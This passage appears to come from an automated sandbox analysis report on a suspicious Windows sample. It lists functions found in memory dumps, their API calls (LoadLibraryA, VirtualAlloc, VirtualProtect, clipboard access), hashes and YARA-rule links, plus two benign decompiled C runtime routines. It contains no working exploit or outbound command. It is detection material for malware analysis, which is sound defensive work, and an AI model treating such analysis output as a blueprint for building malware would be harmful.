                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F70B42
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                  • Opcode ID: 85885cf879b75d7c6a955e0ba6eb6c89e1f41cbbfb03c5c1115cda02fab05c25
                                                                                                                                                  • Instruction ID: 3bf854fb8e716b9bdde6483014e526ca80367dd6671dff8bfc7ded9af7b22c95
                                                                                                                                                  • Opcode Fuzzy Hash: 85885cf879b75d7c6a955e0ba6eb6c89e1f41cbbfb03c5c1115cda02fab05c25
                                                                                                                                                  • Instruction Fuzzy Hash: AF41B0B1D103499FDB14CFA9C884ADEBBB5BF48314F24812AE819AB250D774A946CF91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F7311C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F73889
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                                  • Opcode ID: 36f118ba9d08e632217446a72f62ccb4291e604a321123d896c040c43de58979
                                                                                                                                                  • Instruction ID: 4da65dd7730e90d8f0d4911232e958662035f07ba54d1545b0faba9b3830be04
                                                                                                                                                  • Opcode Fuzzy Hash: 36f118ba9d08e632217446a72f62ccb4291e604a321123d896c040c43de58979
                                                                                                                                                  • Instruction Fuzzy Hash: 014119B5E00309DFDB14CF99C488BAABBF5FB88314F148459D919A7721D378E846CBA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F7FA24, Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 04F7FAFA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                  • Opcode ID: 7c035a0cdede75edeccfc72de104ded16e24b71a932cbf413774921e40cda664
                                                                                                                                                  • Instruction ID: 5ef25562e57b3fcf7f045981e736d4a8938e4a8fd5d9bf8b7e5b5922f821c0d2
                                                                                                                                                  • Opcode Fuzzy Hash: 7c035a0cdede75edeccfc72de104ded16e24b71a932cbf413774921e40cda664
                                                                                                                                                  • Instruction Fuzzy Hash: 5D3105B1D106498FDB14CFA8C995B9EBBB1FB08314F14852AE815A7640D778A446CFA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F7DE5C, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 04F7FAFA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                  • Opcode ID: f9d8cca9f4d41b474ba05f120af8a3ecac6ef159293990f8d14b58317ea1f7bc
                                                                                                                                                  • Instruction ID: a3ab71bc57ba96c4070342c21c9c8e649c143688df16870ce2e177f00344a577
                                                                                                                                                  • Opcode Fuzzy Hash: f9d8cca9f4d41b474ba05f120af8a3ecac6ef159293990f8d14b58317ea1f7bc
                                                                                                                                                  • Instruction Fuzzy Hash: 9D3136B0E14249DFDB14CFA9C495B9EBBF1FB08314F14852AE815A7340D778A446CFA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0217AFE0, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 0217B0B4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.930247848.0000000002170000.00000040.00000001.sdmp, Offset: 02170000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                  • Opcode ID: a11d7e543ac649d85a51d1e7ff5532aa1ec6413f0a3dda0c8e45262bf0c42706
                                                                                                                                                  • Instruction ID: dd5d756f79038e5628d5ae63c7fe03c211dab406f06e102170d1b449decc9b5a
                                                                                                                                                  • Opcode Fuzzy Hash: a11d7e543ac649d85a51d1e7ff5532aa1ec6413f0a3dda0c8e45262bf0c42706
                                                                                                                                                  • Instruction Fuzzy Hash: 313116B0D046598FDB10CFA9C88579EBBF1BF88308F108529D825A7350D7789545CF92
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 05A68855, Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936841447.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Clipboard
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 220874293-0
                                                                                                                                                  • Opcode ID: 044e2687dded4049af263b03d3c126241b3f8b1f1c1b1184610f718bb737005c
                                                                                                                                                  • Instruction ID: a686d3cd44942068862920dee9beb0a8906d0c9a733f18b6c7e044b7832137c0
                                                                                                                                                  • Opcode Fuzzy Hash: 044e2687dded4049af263b03d3c126241b3f8b1f1c1b1184610f718bb737005c
                                                                                                                                                  • Instruction Fuzzy Hash: F231D2B1D01209DFDB14CFA8C585BDDBBF5BF08318F248459E405AB790D7B89989CB52
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 05A68860, Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936841447.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Clipboard
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 220874293-0
                                                                                                                                                  • Opcode ID: 8c096f65aa8757a587195cce7f870b587097ac42b344576a0acf6b21e41034c9
                                                                                                                                                  • Instruction ID: 5f95b4145b38cf4033599ebb23e0cc2d1515dd14c59ac6155b8b848b3aad9d3d
                                                                                                                                                  • Opcode Fuzzy Hash: 8c096f65aa8757a587195cce7f870b587097ac42b344576a0acf6b21e41034c9
                                                                                                                                                  • Instruction Fuzzy Hash: 1F31D4B1D00249DFDB14CF99C585BDEBBF5BF48318F248419E405AB390D7B89949CB52
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F72501, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04F7258F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: 897ddbe371cb68363af38dbb1cdee392eee73c207249e6efd393b379c87d5a2e
                                                                                                                                                  • Instruction ID: 29875e8c32a60b302f65fa78ec43c21a00d15f38629bace2172b97cea1d95c4c
                                                                                                                                                  • Opcode Fuzzy Hash: 897ddbe371cb68363af38dbb1cdee392eee73c207249e6efd393b379c87d5a2e
                                                                                                                                                  • Instruction Fuzzy Hash: 2221E0B5D00209AFDB10CFA9D484ADEBFF8FB58324F15841AE958A3310D378A945CFA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F72508, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04F7258F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: 8259110716b47f2c5f7f092d47ac41ff7fde156ce25206cfcba83e7c33ad5c9d
                                                                                                                                                  • Instruction ID: 670acaa325723602c1c2be714418c49c8df644522607e977bcea52f25bfb51e2
                                                                                                                                                  • Opcode Fuzzy Hash: 8259110716b47f2c5f7f092d47ac41ff7fde156ce25206cfcba83e7c33ad5c9d
                                                                                                                                                  • Instruction Fuzzy Hash: BE21D3B5D002499FDB10CFAAD884ADEFBF8FB48324F15841AE955A3310D378A955CFA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F77E1F, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 04F77EAA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EncodePointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2118026453-0
                                                                                                                                                  • Opcode ID: 0dbd9ce6641fc0453db184323f6d6076fe5636b06115c5e80d126e2a4cf96bf8
                                                                                                                                                  • Instruction ID: dfbb0d91d3da06ea00f9973d7792668fbdc7cfbbb97764b3e25e049ec856241e
                                                                                                                                                  • Opcode Fuzzy Hash: 0dbd9ce6641fc0453db184323f6d6076fe5636b06115c5e80d126e2a4cf96bf8
                                                                                                                                                  • Instruction Fuzzy Hash: DA21CDB1D007468FDB10EFA8D8487DEBBF8FB09324F10851AD464A7680D778B905CBA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 05A67B01, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,05A67AF7), ref: 05A67B87
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936841447.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                  • Opcode ID: ba30d7f3565fb61fecb005eadf5f18f661b1df296434d975ffde4435c1a70c4c
                                                                                                                                                  • Instruction ID: 5c744b5e45b1718e8ac81b313f96b6233622a0369f738e7f57a3eaabf1133c6e
                                                                                                                                                  • Opcode Fuzzy Hash: ba30d7f3565fb61fecb005eadf5f18f661b1df296434d975ffde4435c1a70c4c
                                                                                                                                                  • Instruction Fuzzy Hash: 4B1167718042488FCB10CFAAD845BCEBBF4EB49314F14845AD959A7711C378A445CFA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 05A64CD0, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,05A67AF7), ref: 05A67B87
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936841447.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                  • Opcode ID: 248baaf03740de26e427f81e13aa85f59f3436d621de37925e1ae686704bb98e
                                                                                                                                                  • Instruction ID: a04d74a2283c3f927913ce73d81cdca1e6e3f1432a4d9ab39dcf71cc0703e2b5
                                                                                                                                                  • Opcode Fuzzy Hash: 248baaf03740de26e427f81e13aa85f59f3436d621de37925e1ae686704bb98e
                                                                                                                                                  • Instruction Fuzzy Hash: 7E1146B19047498FCB10DFAAD444BDEFBF4EB59328F10841AD46AA7711C774A948CBA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F77E30, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 04F77EAA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EncodePointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2118026453-0
                                                                                                                                                  • Opcode ID: 8ac55ccf90090be1020c3e70ebea73bb6d3ad54b7c3bca09285de5b26e4ec40e
                                                                                                                                                  • Instruction ID: 0ac98787a95ebf1254e7e5e10f0642095f082ab30da20807db3b30c2d1babe47
                                                                                                                                                  • Opcode Fuzzy Hash: 8ac55ccf90090be1020c3e70ebea73bb6d3ad54b7c3bca09285de5b26e4ec40e
                                                                                                                                                  • Instruction Fuzzy Hash: 51116771D007498FDB10DFA9D90879EBBF8FB49314F10842AD455A3640D779A945CFA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F77E32, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 04F77EAA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EncodePointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2118026453-0
                                                                                                                                                  • Opcode ID: 618cf91aa1462d4b8c685130eb353514ec7e085d44aae47ae5a7ecaf13e452de
                                                                                                                                                  • Instruction ID: e2659d73dc429d41e2b374e7efd565e26e80cdb205c32decb3bd932b53f0fb4d
                                                                                                                                                  • Opcode Fuzzy Hash: 618cf91aa1462d4b8c685130eb353514ec7e085d44aae47ae5a7ecaf13e452de
                                                                                                                                                  • Instruction Fuzzy Hash: 39118B71D007498FDB10DFA9D5487DEBBF8FB48314F10852AD455A3640C779A945CFA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0217AE30, Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0217AEA3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.930247848.0000000002170000.00000040.00000001.sdmp, Offset: 02170000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                  • Opcode ID: e9bcf9c32e77ad9cb3c823ba2c00cb343edc75d07d03b0ac617c471032f9b49c
                                                                                                                                                  • Instruction ID: 875977ad58cfee72fecdfe390618f20de95b6c2296ef9159bc78ea702cabeb3a
                                                                                                                                                  • Opcode Fuzzy Hash: e9bcf9c32e77ad9cb3c823ba2c00cb343edc75d07d03b0ac617c471032f9b49c
                                                                                                                                                  • Instruction Fuzzy Hash: D511E2B5D002499FCB10CF9AD484BDEFBF4FB48314F10842AE869A7610C374A544CFA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 05A64CDC, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,05A67AF7), ref: 05A67B87
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936841447.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                  • Opcode ID: 2a485874a3bd429d16c6aa7c5d258c2c17f2611e52ffbc38664f8a7427dc5520
                                                                                                                                                  • Instruction ID: 98fd836e9cbe47dd882b1fe9e06777a01a4f6d9b52058396de49cb07368f6ce3
                                                                                                                                                  • Opcode Fuzzy Hash: 2a485874a3bd429d16c6aa7c5d258c2c17f2611e52ffbc38664f8a7427dc5520
                                                                                                                                                  • Instruction Fuzzy Hash: A31125B19006498FCB10DF9AD444BDEFBF8EB49228F10841AD52AB7710C774A944CFA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040D534, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                                                                  0x0040d549
                                                                                                                                                  0x0040d54f
                                                                                                                                                  0x0040d556
                                                                                                                                                  0x0040d55d
                                                                                                                                                  0x0040d563
                                                                                                                                                  0x0040d559
                                                                                                                                                  0x0040d559
                                                                                                                                                  0x0040d559

                                                                                                                                                  APIs
                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 10892065-0
                                                                                                                                                  • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                  • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                  • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                  • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004104E0, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004104E0() {
				void* _t1;

				_t1 = E0041046E(0); // executed
				return _t1;
			}




                                                                                                                                                  0x004104e2
                                                                                                                                                  0x004104e8

                                                                                                                                                  APIs
                                                                                                                                                  • __encode_pointer.LIBCMT ref: 004104E2
                                                                                                                                                    • Part of subcall function 0041046E: TlsGetValue.KERNEL32(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410480
                                                                                                                                                    • Part of subcall function 0041046E: TlsGetValue.KERNEL32(00000004,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410497
                                                                                                                                                    • Part of subcall function 0041046E: RtlEncodePointer.NTDLL(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 004104D5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2585649348-0
                                                                                                                                                  • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                  • Instruction ID: 0e51a9b5fb3a4ef556cbf6530202f05b5f2c67c7b2b168a65c09d71fd2c62196
                                                                                                                                                  • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0217BE80, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0217BEE8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.930247848.0000000002170000.00000040.00000001.sdmp, Offset: 02170000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 08a2730e406f204f27a3a0b9d75a2b25114b1dfe816aeb327d1e6f311f2f971e
                                                                                                                                                  • Instruction ID: 54b29c416ff48581648b7c2febcfc920341b02e64e5be2958b9812676e58556e
                                                                                                                                                  • Opcode Fuzzy Hash: 08a2730e406f204f27a3a0b9d75a2b25114b1dfe816aeb327d1e6f311f2f971e
                                                                                                                                                  • Instruction Fuzzy Hash: 741104759006499FCB10DF9AC444BDEFBF8EB88324F108419E559A7710C775A944CFA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 01FBD674, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.929681762.0000000001FBD000.00000040.00000001.sdmp, Offset: 01FBD000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: be8994329196f71d0ed444d1c50d0e27b77d6a529555a562de654d979c5f3792
                                                                                                                                                  • Instruction ID: 396f9ee2225a17fd75ed984ffea04e5480c29e0cefdf8966c9599d94f451ae45
                                                                                                                                                  • Opcode Fuzzy Hash: be8994329196f71d0ed444d1c50d0e27b77d6a529555a562de654d979c5f3792
                                                                                                                                                  • Instruction Fuzzy Hash: 712148B6500280DFCB05DF54C9C0B96BF66FB88328F208569E8094B607C337D446CBA3
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 01FBD588, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.929681762.0000000001FBD000.00000040.00000001.sdmp, Offset: 01FBD000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ff852f93ad85c221abb404f0df4cc574cd7eb1f0cc189ce223daf5cdb8d762bc
                                                                                                                                                  • Instruction ID: 283fa32629be73026f4efac8792da8b58bfc1f94092e6ca0c3c5ea190d17792b
                                                                                                                                                  • Opcode Fuzzy Hash: ff852f93ad85c221abb404f0df4cc574cd7eb1f0cc189ce223daf5cdb8d762bc
                                                                                                                                                  • Instruction Fuzzy Hash: CD2106B6500244DFDB05DF55D9C0B96BB66FB9432CF208569E8090B606C337D456CBA3
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 01FCD01C, Relevance: .1, Instructions: 74COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.929767424.0000000001FCD000.00000040.00000001.sdmp, Offset: 01FCD000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c45b00a28767a044c439a6a728e482b6a1d427172e6000cef606614bae3410cb
                                                                                                                                                  • Instruction ID: 7c317a35dae4ee8fea649631cf316e6420f18d1818aff9d1cf50e7a23dc9ee65
                                                                                                                                                  • Opcode Fuzzy Hash: c45b00a28767a044c439a6a728e482b6a1d427172e6000cef606614bae3410cb
                                                                                                                                                  • Instruction Fuzzy Hash: C8210372544241DFCB15DF58DAC4B2ABBA5FB84B64F20857DE8090B60AC337D84AD7E2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 01FCD104, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.929767424.0000000001FCD000.00000040.00000001.sdmp, Offset: 01FCD000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2edc0511d25ac2bf6bce264382a1a38cc8cfa85c329859d2ce884a1fcac43b0b
                                                                                                                                                  • Instruction ID: 80c504b749557aeba3da582b6b563eab54a583fe7113d41b2cb425242275c3bb
                                                                                                                                                  • Opcode Fuzzy Hash: 2edc0511d25ac2bf6bce264382a1a38cc8cfa85c329859d2ce884a1fcac43b0b
                                                                                                                                                  • Instruction Fuzzy Hash: 6521D675604244EFEB05DF54CAC0B2ABBA5FB84614F20C57DD8494B742C337D84AD7A2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 01FCD005, Relevance: .1, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.929767424.0000000001FCD000.00000040.00000001.sdmp, Offset: 01FCD000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f7b7d8eef0bd989c848d0884e60516f2f44ec2f39201c7a4793bbf6373d1424b
                                                                                                                                                  • Instruction ID: 35607fa07a85b6dd6cbffa9684601c48d81a8b32399933cb8a8d13a4f6986bf4
                                                                                                                                                  • Opcode Fuzzy Hash: f7b7d8eef0bd989c848d0884e60516f2f44ec2f39201c7a4793bbf6373d1424b
                                                                                                                                                  • Instruction Fuzzy Hash: 0421B6754093C0CFCB13CF24D594715BF71EB46610F2881EAD8448B657C33AD81ACBA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 01FBD66F, Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.929681762.0000000001FBD000.00000040.00000001.sdmp, Offset: 01FBD000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
